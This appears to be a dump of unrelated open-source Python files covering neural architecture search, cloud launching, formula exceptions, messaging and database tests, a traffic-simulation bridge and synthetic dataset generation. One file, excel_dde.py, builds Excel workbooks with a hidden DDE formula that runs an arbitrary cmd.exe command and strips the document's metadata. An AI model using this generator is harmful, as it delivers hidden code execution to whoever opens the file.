type=int, const=10, default=10,
help="number of nodes")
parser.add_argument('--num_tokens', dest="num_tokens", nargs="?",
type=int, const=10, default=10,
help="number of tokens")
parser.add_argument('--learning_rate', dest="learning_rate", nargs="?",
type=float, default=1e-3,
help="learning rate")
parser.add_argument('--batch_size', dest="batch_size", nargs="?",
type=int, const=10, default=10, help="batch size")
parser.add_argument('--num_models', dest="num_models", nargs="?",
type=int, const=32000, default=32000,
help="maximum number of models sampled")
parser.add_argument('--early_stop', dest="early_stop", nargs="?",
type=int, const=20, default=20, help="early stop")
parser.add_argument('--log_dir', dest="log_dir", nargs="?", type=str,
const="./log", default="./log",
help="directory of log")
parser.add_argument('--input_size', dest="input_size", nargs="?",
type=int, const=10, default=10, help="input size")
parser.add_argument('--hidden_size', dest="hidden_size", nargs="?",
type=int, const=64, default=64, help="hidden size")
parser.add_argument('--num_layers', dest="num_layers", nargs="?",
type=int, const=2, default=2, help="num layers")
parser.add_argument('--bl_decay', dest="bl_decay", nargs="?",
type=float, const=0.9, default=0.9,
help="base line decay")
# inception train config
parser.add_argument('--data_path', dest="data_path", nargs="?",
type=str, default="./cifar/pickle-cifar-10",
help="path of data files")
parser.add_argument('--chunk_size', dest="chunk_size", nargs="?",
type=int, const=100, default=100,
help="chunk size")
parse_args = parser.parse_args()
return parse_args
def supervisor(self, mid):
"""
execute cnn training
sample cmd: python -u inception_train/train.py --mid=9 \
--early_stop=20 --data_path=./cifar/pickle-cifar-10
"""
tokens, adjvec = utils.load_action(mid, self.log_dir)
cmd = ("CUDA_VISIBLE_DEVICES=1 python -u inception_train/train.py \
--mid=%d --early_stop=%d --logdir=%s --data_path=%s --chunk_size=%d") % \
(mid, self.early_stop, self.log_dir, self.data_path, self.chunk_size)
print("cmd:{}".format(cmd))
while True:
try:
subprocess.check_call(cmd, shell=True)
break
except subprocess.CalledProcessError as e:
print("[%s] training model #%d exits with exit code %d" %
(utils.stime(), mid, e.returncode), file=sys.stderr)
return
def simple_run(self):
"""
simple run
"""
print("Simple run target is 20")
mid = 0
shadow = 0
is_first = True
while mid <= self.num_models:
actions_to, actions_ad = self.autodl_agent.sample()
rewards = np.count_nonzero(actions_to == 1, axis=1).astype("int32")
# moving average
current_mean_reward = np.mean(rewards)
if is_first:
shadow = current_mean_reward
is_first = False
else:
shadow = shadow * self.bl_decay \
+ current_mean_reward * (1 - self.bl_decay)
self.autodl_agent.learn((np.array(actions_to).astype("int32"),
np.array(actions_ad).astype("int32")),
rewards - shadow)
if mid % 10 == 0:
print('mid=%d, average rewards=%.3f' % (mid, np.mean(rewards)))
mid += 1
def run(self):
"""
run
"""
rewards = []
mid = 0
while mid <= self.num_models:
actions_to, actions_ad = self.autodl_agent.sample()
for action in zip(actions_to, actions_ad):
utils.dump_action(mid, action, self.log_dir)
self.supervisor(mid)
current_reward = utils.load_reward(mid, self.log_dir)
if not np.isnan(current_reward):
rewards.append(current_reward.item())
mid += 1
if len(rewards) % self.batch_size == 0:
print("[%s] step = %d, average accuracy = %.3f" %
(utils.stime(), self.autodl_agent.global_step,
np.mean(rewards)))
rewards_array = np.array(rewards).astype("float32")
if self.total_reward == 0:
self.total_reward = rewards_array.mean()
else:
self.total_reward = self.total_reward * self.bl_decay \
+ (1 - self.bl_decay) * rewards_array.mean()
rewards_array = rewards_array - self.total_reward
self.autodl_agent.learn([actions_to.astype("int32"),
actions_ad.astype("int32")],
rewards_array ** 3)
rewards = []
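# A minimal, self-contained sketch of the exponential-moving-average baseline ("shadow" /
# "total_reward") used by AutoDL above (illustrative; the reward stream is made up):
def _ema_baseline_demo(rewards, decay=0.9):
    shadow, advantages = None, []
    for r in rewards:
        # the first reward initializes the baseline, afterwards it decays towards new rewards
        shadow = r if shadow is None else shadow * decay + r * (1 - decay)
        advantages.append(r - shadow)
    return advantages
# e.g. _ema_baseline_demo([1.0, 2.0, 3.0]) -> [0.0, 0.9, 1.71]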
|
paddleslim/nas/one_shot/one_shot_nas.py
|
zhuguiqian/PaddleSlim
| 923 |
102886
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import paddle.fluid as fluid
from ...common import SAController
__all__ = ['OneShotSuperNet', 'OneShotSearch']
def OneShotSearch(model, eval_func, strategy='sa', search_steps=100):
"""
Search a best tokens which represents a sub-network.
Args:
model(fluid.dygraph.Layer): A dynamic graph module whose sub-modules should contain
one instance of `OneShotSuperNet` at least.
eval_func(function): A callback function which accept model and tokens as arguments.
strategy(str): The name of strategy used to search. Default: 'sa'.
search_steps(int): The total steps for searching.
Returns:
list<int>: The best tokens searched.
"""
super_net = None
for layer in model.sublayers(include_sublayers=False):
print("layer: {}".format(layer))
if isinstance(layer, OneShotSuperNet):
super_net = layer
break
assert super_net is not None
controller = None
if strategy == "sa":
        controller = SAController(
            range_table=super_net.range_table(),
            init_tokens=super_net.init_tokens())
    assert controller is not None, "Unsupported searching strategy."
    for i in range(search_steps):
        tokens = controller.next_tokens()
        reward = eval_func(model, tokens)
        controller.update(tokens, reward, i)
    return controller.best_tokens()
class OneShotSuperNet(fluid.dygraph.Layer):
"""The base class of super net used in one-shot searching strategy.
A super net is a dygraph layer.
Args:
name_scope(str): The name scope of super net.
"""
def __init__(self, name_scope):
super(OneShotSuperNet, self).__init__(name_scope)
def init_tokens(self):
"""Get init tokens in search space.
Returns:
            list<int>: The init tokens, which is a list of integers.
"""
raise NotImplementedError('Abstract method.')
def range_table(self):
"""Get range table of current search space.
Returns:
range_table(tuple): The maximum value and minimum value in each position of tokens
with format `(min_values, max_values)`. The `min_values` is
a list of integers indicating the minimum values while `max_values`
indicating the maximum values.
"""
raise NotImplementedError('Abstract method.')
def _forward_impl(self, *inputs, **kwargs):
"""Defines the computation performed at every call.
Should be overridden by all subclasses.
Args:
inputs(tuple): unpacked tuple arguments
kwargs(dict): unpacked dict arguments
"""
raise NotImplementedError('Abstract method.')
def forward(self, input, tokens=None):
"""
Defines the computation performed at every call.
Args:
input(variable): The input of super net.
tokens(list): The tokens used to generate a sub-network.
None means computing in super net training mode.
Otherwise, it will execute the sub-network generated by tokens.
The `tokens` should be set in searching stage and final training stage.
Default: None.
Returns:
Varaible: The output of super net.
"""
        if tokens is None:
tokens = self._random_tokens()
return self._forward_impl(input, tokens=tokens)
def _random_tokens(self):
tokens = []
for min_v, max_v in zip(self.range_table()[0], self.range_table()[1]):
tokens.append(np.random.randint(min_v, max_v))
return tokens
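# A usage sketch (illustrative; `MySuperNet` and `eval_acc` are hypothetical and not part
# of PaddleSlim):
#
#   class MySuperNet(OneShotSuperNet):
#       def init_tokens(self):
#           return [0, 0, 0]
#       def range_table(self):
#           return ([0, 0, 0], [3, 3, 3])
#       def _forward_impl(self, input, tokens=None):
#           ...  # build and run the sub-network selected by `tokens`
#
#   # `model` is a dygraph Layer containing MySuperNet as a sub-layer:
#   # best_tokens = OneShotSearch(model, eval_acc, strategy='sa', search_steps=100)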
|
ch06/atomic-cloud/ec2atomic.py
|
nhonaitran/docbook
| 244 |
102890
|
#!/usr/bin/env python
import os
from libcloud.compute.types import Provider
from libcloud.compute.providers import get_driver
ACCESS_ID = os.getenv('AWSAccessKeyId')
SECRET_KEY = os.getenv('AWSSecretKey')
IMAGE_ID = 'ami-05513b72'
SIZE_ID = 't2.micro'
cls = get_driver(Provider.EC2_EU_WEST)
driver = cls(ACCESS_ID, SECRET_KEY)
sizes = driver.list_sizes()
images = driver.list_images()
size = [s for s in sizes if s.id == SIZE_ID][0]
image = [i for i in images if i.id == IMAGE_ID][0]
#Reads cloud config file
userdata = "\n".join(open('./cloud.cfg').readlines())
#Replace the name of the ssh key pair with yours
#You will need to open SSH port 22 on your default security group
name = "atomic"
node = driver.create_node(name=name, image=image,size=size,ex_keyname='atomic',ex_userdata=userdata)
snap, ip = driver.wait_until_running(nodes=[node])[0]
print ip[0]
|
backend/src/baserow/contrib/database/formula/parser/exceptions.py
|
lucastm/baserow
| 839 |
102902
|
from baserow.contrib.database.formula.exceptions import BaserowFormulaException
class InvalidNumberOfArguments(BaserowFormulaException):
def __init__(self, function_def, num_args):
if num_args == 1:
error_prefix = "1 argument was"
else:
error_prefix = f"{num_args} arguments were"
super().__init__(
f"{error_prefix} given to the {function_def}, it must instead "
f"be given {function_def.num_args}"
)
class MaximumFormulaSizeError(BaserowFormulaException):
def __init__(self):
super().__init__("it exceeded the maximum formula size")
class UnknownFieldByIdReference(BaserowFormulaException):
def __init__(self, unknown_field_id):
super().__init__(
f"there is no field with id {unknown_field_id} but the formula"
f" included a direct reference to it"
)
class UnknownOperator(BaserowFormulaException):
def __init__(self, operatorText):
super().__init__(f"it used the unknown operator {operatorText}")
class BaserowFormulaSyntaxError(BaserowFormulaException):
pass
|
tests/triggers_timer_based_trigger_control/test.py
|
JoshTDN03/knix
| 167 |
102913
|
# Copyright 2020 The KNIX Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import random
import sys
import time
import unittest
import socket
import os
import subprocess
sys.path.append("../")
from mfn_test_utils import MFNTest
print("Starting rabbitmq")
rabbit = subprocess.Popen(["scripts/run_local_rabbitmq.sh"])
time.sleep(20)
print("Starting publisher")
pub = subprocess.Popen(["scripts/run_local_publisher.sh"])
time.sleep(10)
os.system("scripts/run_local_subscriber.sh")
print("Publisher is ready")
class TriggersAmqpTest(unittest.TestCase):
# @unittest.skip("")
def test_triggers_timer_based_trigger_control(self):
test = MFNTest(test_name='triggers_timer_based_trigger_control',
workflow_filename='wf_triggers_timer_based_trigger_control.json')
time.sleep(5)
print("Executing test")
# ["wf_triggers_timer_based_trigger_control", "trigger_amqp_to_be_controlled_nonce", "amqp://rabbituser:rabbitpass@paarijaat-debian-vm:5672/%2frabbitvhost", "rabbit.*.*", "egress_exchange", "trigger_timer_controller_nonce", 20000]
nonce = str(int(time.time() * 1000))
curr_hostname = socket.gethostname()
input_data = []
workflowname = "wf_triggers_timer_based_trigger_control"
trigger_name_amqp = "trigger_amqp_to_be_controlled_" + nonce
amqp_addr = "amqp://rabbituser:rabbitpass@" + curr_hostname + ":5672/%2frabbitvhost"
routingkey = "rabbit.*.*"
routingkey_to_expect = "rabbit.routing.key"
exchange = "egress_exchange"
trigger_name_timer = "trigger_timer_controller_" + nonce
ttl = 20000
input_data.append(workflowname)
input_data.append(trigger_name_amqp)
input_data.append(amqp_addr)
input_data.append(routingkey)
input_data.append(exchange)
input_data.append(trigger_name_timer)
input_data.append(ttl)
response = test.execute(input_data)
time.sleep((float(ttl)/1000.0) + 10)
print("Shutting down rabbitmq and publisher")
pub.terminate()
rabbit.terminate()
subprocess.Popen(["scripts/stop_local_rabbitmq.sh"])
time.sleep(5)
counter_state_1 = 0
counter_state_2 = 0
counter_state_1_error = 0
counter_state_2_error = 0
logs = test.get_workflow_logs()
wflog = logs["log"]
log_lines = wflog.split("\n")
for line in log_lines:
if "_!_TRIGGER_START_" + trigger_name_amqp + ";timer_based_trigger_control;" + workflowname + ";" + routingkey_to_expect + ";" in line.strip():
counter_state_1 = counter_state_1 + 1
print(line.strip())
if "_!_TRIGGER_ERROR_" + trigger_name_amqp + ";timer_based_trigger_control;" + workflowname + ";;" in line.strip():
counter_state_1_error = counter_state_1_error + 1
print(line.strip())
if "_!_TRIGGER_START_" + trigger_name_timer + ";timer_based_trigger_control_state2;" + workflowname + ";;" in line.strip():
counter_state_2 = counter_state_2 + 1
print(line.strip())
if "_!_TRIGGER_ERROR_" + trigger_name_timer + ";timer_based_trigger_control_state2;" + workflowname + ";;" in line.strip():
counter_state_2_error = counter_state_2_error + 1
print(line.strip())
if counter_state_1 >=20 and counter_state_2 == 1 and counter_state_1_error == 0 and counter_state_2_error == 0:
print("Number of state1 triggers: " + str(counter_state_1))
print("Number of state2 triggers: " + str(counter_state_2))
print("Number of state1 error triggers: " + str(counter_state_1_error))
print("Number of state1 error triggers: " + str(counter_state_2_error))
test.report(True, str(input_data), input_data, response)
else:
print("Number of state1 triggers: " + str(counter_state_1))
print("Number of state2 triggers: " + str(counter_state_2))
print("Number of state1 error triggers: " + str(counter_state_1_error))
print("Number of state1 error triggers: " + str(counter_state_2_error))
test.report(False, str(input_data), input_data, response)
for line in log_lines:
print(line.strip())
test.undeploy_workflow()
test.cleanup()
|
src/modules/excel_dde.py
|
mehrdad-shokri/macro_pack
| 1,550 |
102915
|
<filename>src/modules/excel_dde.py
#!/usr/bin/env python
# encoding: utf-8
# Only enabled on windows
import sys
from collections import OrderedDict
if sys.platform == "win32":
# Download and install pywin32 from https://sourceforge.net/projects/pywin32/files/pywin32/
import win32com.client # @UnresolvedImport
import logging
from modules.excel_gen import ExcelGenerator
from common import utils
class ExcelDDE(ExcelGenerator):
"""
    Module used to generate an MS Excel file with a DDE object attack
"""
def run(self):
logging.info(" [+] Generating MS Excel with DDE document...")
try:
# Get command line
paramDict = OrderedDict([("Cmd_Line",None)])
self.fillInputParams(paramDict)
command = paramDict["Cmd_Line"]
logging.info(" [-] Open document...")
            # open up an instance of Excel with the win32com driver
excel = win32com.client.Dispatch("Excel.Application")
# do the operation in background without actually opening Excel
#excel.Visible = False
workbook = excel.Workbooks.Open(self.outputFilePath)
logging.info(" [-] Inject DDE field (Answer 'No' to popup)...")
ddeCmd = r"""=MSEXCEL|'\..\..\..\Windows\System32\cmd.exe /c %s'!A1""" % command.rstrip()
excel.Cells(1, 26).Formula = ddeCmd
excel.Cells(1, 26).FormulaHidden = True
# Remove Informations
logging.info(" [-] Remove hidden data and personal info...")
xlRDIAll=99
workbook.RemoveDocumentInformation(xlRDIAll)
logging.info(" [-] Save Document...")
excel.DisplayAlerts=False
excel.Workbooks(1).Close(SaveChanges=1)
excel.Application.Quit()
# garbage collection
del excel
logging.info(" [-] Generated %s file path: %s" % (self.outputFileType, self.outputFilePath))
except Exception:
logging.exception(" [!] Exception caught!")
logging.error(" [!] Hints: Check if MS office is really closed and Antivirus did not catch the files")
logging.error(" [!] Attempt to force close MS Excel applications...")
objExcel = win32com.client.Dispatch("Excel.Application")
objExcel.Application.Quit()
del objExcel
# If it Application.Quit() was not enough we force kill the process
if utils.checkIfProcessRunning("Excel.exe"):
utils.forceProcessKill("Excel.exe")
|
functests/test_events.py
|
webfolderio/akumuli
| 1,094 |
102917
|
<gh_stars>1000+
from __future__ import print_function
import os
import sys
import socket
import datetime
import time
import akumulid_test_tools as att
from akumulid_test_tools import retry, api_test, on_exit
import json
try:
from urllib2 import urlopen, HTTPError, URLError
except ImportError:
from urllib import urlopen, HTTPError, URLError
import traceback
import itertools
import math
HOST = '127.0.0.1'
TCPPORT = 8282
HTTPPORT = 8181
allevents = []
@api_test("select-events forward")
def test_select_events_forward(dtstart, delta, N):
"""Read events in forward direction"""
nseries = 10
begin = dtstart
end = dtstart + delta*(N + 1)
query = {
"select-events": "!foo",
"range": {
"from": begin.strftime('%Y%m%dT%H%M%S.%f'),
"to": end.strftime('%Y%m%dT%H%M%S.%f'),
},
"order-by": "time",
"output": { "format": "csv" }
}
queryurl = "http://{0}:{1}/api/query".format(HOST, HTTPPORT)
response = urlopen(queryurl, json.dumps(query))
iterations = 0
for line in response:
try:
expts, expname = allevents[iterations]
columns = line.split(',')
timestamp = att.parse_timestamp(columns[1].strip())
event = columns[2].lstrip().rstrip('\n')
if timestamp != expts:
print("Unexpected timestamp in line {0}".format(line))
raise ValueError("Wrong timestamp {0}, expected {1}".format(str(timestamp), str(expts)))
if expname != event:
print("Unexpected value in line {0}".format(line))
raise ValueError("Wrong value {0}, expected {1}".format(event, expname))
iterations += 1
except:
print("Error at line: {0}".format(line))
raise
if iterations != len(allevents):
raise ValueError("Results incomplete, {0} received, {1} expected".format(iterations, len(allevents)))
@api_test("select-events backward")
def test_select_events_backward(dtstart, delta, N):
"""Read events in backward direction"""
nseries = 10
end = dtstart - delta
begin = dtstart + delta*(N + 1)
query = {
"select-events": "!foo",
"range": {
"from": begin.strftime('%Y%m%dT%H%M%S.%f'),
"to": end.strftime('%Y%m%dT%H%M%S.%f'),
},
"order-by": "time",
"output": { "format": "csv" }
}
queryurl = "http://{0}:{1}/api/query".format(HOST, HTTPPORT)
response = urlopen(queryurl, json.dumps(query))
iterations = 0
for line in response:
try:
expts, expname = allevents[-(iterations + 1)]
columns = line.split(',')
timestamp = att.parse_timestamp(columns[1].strip())
event = columns[2].lstrip().rstrip('\n')
if timestamp != expts:
print("Unexpected timestamp in line {0}".format(line))
raise ValueError("Wrong timestamp {0}, expected {1}".format(str(timestamp), str(expts)))
if expname != event:
print("Unexpected value in line {0}".format(line))
raise ValueError("Wrong value {0}, expected {1}".format(event, expname))
iterations += 1
except:
print("Error at line: {0}".format(line))
raise
if iterations != len(allevents):
raise ValueError("Results incomplete, {0} received, {1} expected".format(iterations, len(allevents)))
def main(path):
akumulid = att.create_akumulid(path)
# Reset database
akumulid.delete_database()
akumulid.create_database()
# start ./akumulid server
print("Starting server...")
akumulid.serve()
time.sleep(5)
try:
chan = att.TCPChan(HOST, TCPPORT)
# fill data in
dt = datetime.datetime.utcnow().replace(hour=0, minute=0, second=10, microsecond=0)
delta = datetime.timedelta(seconds=1)
nmsgs = 1000
snames = [
'!foo A=1 B=1',
'!foo A=1 B=2',
'!foo A=2 B=1',
'!foo A=2 B=2',
]
print("Sending {0} messages through TCP...".format(nmsgs*len(snames)))
cnt = 0
timestamp = dt
for it in range(0, nmsgs):
for sname in snames:
timestr = timestamp.strftime('+%Y%m%dT%H%M%S.%f')
event = "{0} event {1} for {2} generated".format(cnt, sname, timestr)
msg = "+{0}\r\n+{1}\r\n+{2}\r\n".format(sname, timestr, event[:it + 1])
allevents.append((timestamp, event[:it + 1]))
chan.send(msg)
cnt += 1
timestamp = timestamp + delta
        time.sleep(5)  # wait until all messages have been processed
test_select_events_forward(dt, delta, nmsgs*len(snames))
test_select_events_backward(dt, delta, nmsgs*len(snames))
finally:
print("Stopping server...")
akumulid.stop()
time.sleep(5)
on_exit()
if __name__ == '__main__':
print(' '.join(sys.argv))
if len(sys.argv) < 2:
print("Not enough arguments")
sys.exit(1)
main(sys.argv[1])
else:
raise ImportError("This module shouldn't be imported")
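# A self-contained sketch of the query payload shape POSTed to /api/query by both tests above
# (illustrative; `begin`/`end` are datetime objects and the series filter "!foo" mirrors the tests):
def _build_select_events_query(begin, end):
    return {
        "select-events": "!foo",
        "range": {
            "from": begin.strftime('%Y%m%dT%H%M%S.%f'),
            "to": end.strftime('%Y%m%dT%H%M%S.%f'),
        },
        "order-by": "time",
        "output": {"format": "csv"},
    }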
|
nsot/api/routers.py
|
comerford/nsot
| 387 |
102930
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from __future__ import absolute_import
from rest_framework_bulk.routes import BulkRouter
from rest_framework_nested.routers import NestedSimpleRouter
__all__ = ('BulkRouter', 'BulkNestedRouter')
# Map of HTTP verbs to rest_framework_bulk operations.
BULK_OPERATIONS_MAP = {
'put': 'bulk_update',
'patch': 'partial_bulk_update',
'delete': 'bulk_destroy',
}
class BulkNestedRouter(NestedSimpleRouter):
"""
Bulk-enabled nested router.
"""
def __init__(self, *args, **kwargs):
super(BulkNestedRouter, self).__init__(*args, **kwargs)
self.routes[0].mapping.update(BULK_OPERATIONS_MAP)
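# A usage sketch (illustrative; `DeviceViewSet` and `InterfaceViewSet` are hypothetical viewsets):
#
#   router = BulkRouter()
#   router.register(r'devices', DeviceViewSet)
#   nested = BulkNestedRouter(router, r'devices', lookup='device')
#   nested.register(r'interfaces', InterfaceViewSet)
#   # the nested list route now also maps PUT/PATCH/DELETE to the bulk_* actions above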
|
Co-Simulation/PTV-Vissim/vissim_integration/bridge_helper.py
|
adelbennaceur/carla
| 7,883 |
102943
|
#!/usr/bin/env python
# Copyright (c) 2020 Computer Vision Center (CVC) at the Universitat Autonoma de
# Barcelona (UAB).
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
""" This module provides a helper for the co-simulation between vissim and carla. """
# ==================================================================================================
# -- imports ---------------------------------------------------------------------------------------
# ==================================================================================================
import logging
import math
import random
import carla # pylint: disable=import-error
# ==================================================================================================
# -- Bridge helper (VISSIM <=> CARLA) --------------------------------------------------------------
# ==================================================================================================
class BridgeHelper(object):
"""
    BridgeHelper provides methods to ease the co-simulation between vissim and carla.
"""
blueprint_library = []
vtypes = {}
@staticmethod
def get_carla_transform(in_vissim_transform, extent=None):
"""
Returns carla transform based on vissim transform.
"""
in_location = in_vissim_transform.location
in_rotation = in_vissim_transform.rotation
# From front-center-bumper to center (vissim reference system).
if extent is not None:
out_location = (in_location.x - math.cos(math.radians(in_rotation.yaw)) * extent.x,
in_location.y - math.sin(math.radians(in_rotation.yaw)) * extent.x,
in_location.z - math.sin(math.radians(in_rotation.pitch)) * extent.x)
else:
out_location = (in_location.x, in_location.y, in_location.z)
out_rotation = (in_rotation.pitch, in_rotation.yaw, in_rotation.roll)
# Transform to carla reference system (left-handed system).
out_transform = carla.Transform(
carla.Location(out_location[0], -out_location[1], out_location[2]),
carla.Rotation(out_rotation[0], -out_rotation[1], out_rotation[2]))
return out_transform
@staticmethod
def get_vissim_transform(in_carla_transform, extent=None):
"""
Returns vissim transform based on carla transform.
"""
in_location = in_carla_transform.location
in_rotation = in_carla_transform.rotation
# From center to front-center-bumper (carla reference system).
if extent is not None:
yaw = -1 * in_rotation.yaw
pitch = in_rotation.pitch
out_location = (in_location.x + math.cos(math.radians(yaw)) * extent.x,
in_location.y - math.sin(math.radians(yaw)) * extent.x,
in_location.z - math.sin(math.radians(pitch)) * extent.x)
else:
out_location = (in_location.x, in_location.y, in_location.z)
out_rotation = (in_rotation.pitch, in_rotation.yaw, in_rotation.roll)
# Transform to vissim reference system (right-handed system).
out_transform = carla.Transform(
carla.Location(out_location[0], -out_location[1], out_location[2]),
carla.Rotation(out_rotation[0], -out_rotation[1], out_rotation[2]))
return out_transform
@staticmethod
def _flip_y(in_vector):
"""
Flips y coordinate of the given vector.
"""
return carla.Vector3D(in_vector.x, -in_vector.y, in_vector.z)
@staticmethod
def get_carla_velocity(in_vissim_velocity):
"""
Returns carla velocity based on vissim velocity.
"""
return BridgeHelper._flip_y(in_vissim_velocity)
@staticmethod
def get_vissim_velocity(in_carla_velocity):
"""
Returns vissim velocity based on carla velocity.
"""
return BridgeHelper._flip_y(in_carla_velocity)
@staticmethod
def _get_recommended_carla_blueprint(vissim_actor):
"""
Returns an appropriate blueprint based on the given vissim actor.
"""
blueprint = BridgeHelper.blueprint_library.filter('vehicle.seat.leon')[0]
color = random.choice(blueprint.get_attribute('color').recommended_values)
blueprint.set_attribute('color', color)
return blueprint
@staticmethod
def get_carla_blueprint(vissim_actor):
"""
Returns an appropriate blueprint based on the received vissim actor.
"""
type_id = str(vissim_actor.type)
if type_id in BridgeHelper.vtypes:
candidates = BridgeHelper.vtypes[type_id]
if candidates:
blueprint_id = random.choice(candidates)
else:
logging.error(
'vissim type %s not supported. No vehicle will be spawned in carla', type_id)
return None
blueprint = BridgeHelper.blueprint_library.filter(blueprint_id)
if not blueprint:
logging.error(
'carla blueprint %s unknown. No vehicle will be spawned', blueprint_id)
return None
blueprint = blueprint[0]
if blueprint.has_attribute('color'):
color = random.choice(blueprint.get_attribute('color').recommended_values)
blueprint.set_attribute('color', color)
if blueprint.has_attribute('driver_id'):
driver_id = random.choice(blueprint.get_attribute('driver_id').recommended_values)
blueprint.set_attribute('driver_id', driver_id)
blueprint.set_attribute('role_name', 'vissim_driver')
return blueprint
else:
logging.error(
'vissim type %s unknown. No vehicle will be spawned in carla', type_id)
return None
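# A pure-Python numeric sketch of the front-bumper/center offset math used above, without
# the carla types (illustrative; the pose and half-length values in the example are made up):
def _bumper_to_center_2d(x, y, yaw_deg, half_length):
    """Shift a front-center-bumper position back to the vehicle center in the x/y plane."""
    return (x - math.cos(math.radians(yaw_deg)) * half_length,
            y - math.sin(math.radians(yaw_deg)) * half_length)
# e.g. _bumper_to_center_2d(10.0, 0.0, 0.0, 2.0) -> (8.0, 0.0)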
|
scripts/generate_example.py
|
joeranbosma/nnDetection
| 242 |
102945
|
"""
Copyright 2020 Division of Medical Image Computing, German Cancer Research Center (DKFZ), Heidelberg, Germany
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import random
import argparse
from pathlib import Path
from multiprocessing import Pool
from itertools import repeat
import numpy as np
import SimpleITK as sitk
from loguru import logger
from nndet.io import save_json
from nndet.utils.check import env_guard
# # 2D example
# [Ignore, Not supported]
# dim = 2
# image_size = [512, 512]
# object_size = [32, 64]
# object_width = 6
# num_images_tr = 100
# num_images_ts = 100
# 3D example
dim = 3
image_size = [256, 256, 256]
object_size = [16, 32]
object_width = 4
def generate_image(image_dir, label_dir, idx):
random.seed(idx)
np.random.seed(idx)
logger.info(f"Generating case_{idx}")
selected_size = np.random.randint(object_size[0], object_size[1])
selected_class = np.random.randint(0, 2)
data = np.random.rand(*image_size)
mask = np.zeros_like(data)
top_left = [np.random.randint(0, image_size[i] - selected_size) for i in range(dim)]
if selected_class == 0:
slicing = tuple([slice(tp, tp + selected_size) for tp in top_left])
data[slicing] = data[slicing] + 0.4
data = data.clip(0, 1)
mask[slicing] = 1
elif selected_class == 1:
slicing = tuple([slice(tp, tp + selected_size) for tp in top_left])
inner_slicing = [slice(tp + object_width, tp + selected_size - object_width) for tp in top_left]
if len(inner_slicing) == 3:
inner_slicing[0] = slice(0, image_size[0])
inner_slicing = tuple(inner_slicing)
object_mask = np.zeros_like(mask).astype(bool)
object_mask[slicing] = 1
object_mask[inner_slicing] = 0
data[object_mask] = data[object_mask] + 0.4
data = data.clip(0, 1)
mask[object_mask] = 1
else:
raise NotImplementedError
if dim == 2:
data = data[None]
mask = mask[None]
data_itk = sitk.GetImageFromArray(data)
mask_itk = sitk.GetImageFromArray(mask)
mask_meta = {
"instances": {
"1": selected_class
},
}
sitk.WriteImage(data_itk, str(image_dir / f"case_{idx}_0000.nii.gz"))
sitk.WriteImage(mask_itk, str(label_dir / f"case_{idx}.nii.gz"))
save_json(mask_meta, label_dir / f"case_{idx}.json")
@env_guard
def main():
"""
Generate an example dataset for nnDetection to test the installation or
experiment with ideas.
"""
parser = argparse.ArgumentParser()
parser.add_argument(
'--full',
help="Increase size of dataset. "
"Default sizes train/test 10/10 and full 1000/1000.",
action='store_true',
)
parser.add_argument(
'--num_processes',
help="Use multiprocessing to create dataset.",
type=int,
default=0,
)
args = parser.parse_args()
full = args.full
num_processes = args.num_processes
num_images_tr = 1000 if full else 10
num_images_ts = 1000 if full else 10
meta = {
"task": f"Task000D{dim}_Example",
"name": "Example",
"target_class": None,
"test_labels": True,
"labels": {"0": "Square", "1": "SquareHole"},
"modalities": {"0": "MRI"},
"dim": dim,
}
# setup paths
data_task_dir = Path(os.getenv("det_data")) / meta["task"]
data_task_dir.mkdir(parents=True, exist_ok=True)
save_json(meta, data_task_dir / "dataset.json")
raw_splitted_dir = data_task_dir / "raw_splitted"
images_tr_dir = raw_splitted_dir / "imagesTr"
images_tr_dir.mkdir(parents=True, exist_ok=True)
labels_tr_dir = raw_splitted_dir / "labelsTr"
labels_tr_dir.mkdir(parents=True, exist_ok=True)
images_ts_dir = raw_splitted_dir / "imagesTs"
images_ts_dir.mkdir(parents=True, exist_ok=True)
labels_ts_dir = raw_splitted_dir / "labelsTs"
labels_ts_dir.mkdir(parents=True, exist_ok=True)
if num_processes == 0:
for idx in range(num_images_tr):
generate_image(
images_tr_dir,
labels_tr_dir,
idx,
)
for idx in range(num_images_tr, num_images_tr + num_images_ts):
generate_image(
images_ts_dir,
labels_ts_dir,
idx,
)
else:
logger.info("Using multiprocessing to create example dataset.")
with Pool(processes=num_processes) as p:
p.starmap(
generate_image,
zip(
repeat(images_tr_dir),
repeat(labels_tr_dir),
range(num_images_tr),
)
)
with Pool(processes=num_processes) as p:
p.starmap(
generate_image,
zip(
repeat(images_ts_dir),
repeat(labels_ts_dir),
range(num_images_tr, num_images_tr + num_images_ts),
)
)
if __name__ == '__main__':
main()
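# A sketch of the per-case annotation written by generate_image above (illustrative values):
#
#   case_0.json  -> {"instances": {"1": 0}}   # instance id "1" in case_0.nii.gz has class 0 ("Square")
#   case_7.json  -> {"instances": {"1": 1}}   # class 1 ("SquareHole")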
|
vectorhub/encoders/text/base.py
|
vector-ai/vectorhub
| 385 |
102966
|
<reponame>vector-ai/vectorhub<filename>vectorhub/encoders/text/base.py
"""
Base Text2Vec Model
"""
import warnings
from ...base import Base2Vec
from abc import ABC, abstractmethod
from typing import Union, List, Dict
class BaseText2Vec(Base2Vec, ABC):
def read(self, text: str):
"""An abstract method to specify the read method to read the data.
"""
pass
@property
def test_word(self):
return "dummy word"
@property
def vector_length(self):
"""
Set the vector length of the model.
"""
if hasattr(self, "_vector_length"):
